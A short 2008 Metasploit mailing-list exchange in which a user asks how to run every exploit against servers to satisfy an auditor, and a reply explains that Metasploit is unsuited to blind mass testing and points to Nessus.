Metasploit mailing list archives

try to exploit everything

From: mail2arthur at gmail.com (arthur)
Date: Fri, 25 Jul 2008 14:15:38 -0400

Thanks. Actually MSF is the 3rd section in my report. The first section is
using nmap to discover the ips/ports, the 2nd section is Nessus blind scan
with all plugin enabled (also unchecked the safeCheck and turn on the
throughTests), but the auditor still likes to see more with MSF :(

Just try to find a easy way to make the guy happy instead of talking too
much.

You know what, even our server is not running web app, he still ask a test
of XSS...

Arthur

Arthur,

For this kind of testing, Metasploit is the wrong tool for the job.
If you just want to huck a bunch of exploits at the target without
regard for whether they might actually work, try something like Nessus
instead.

Hope this helped,
egypt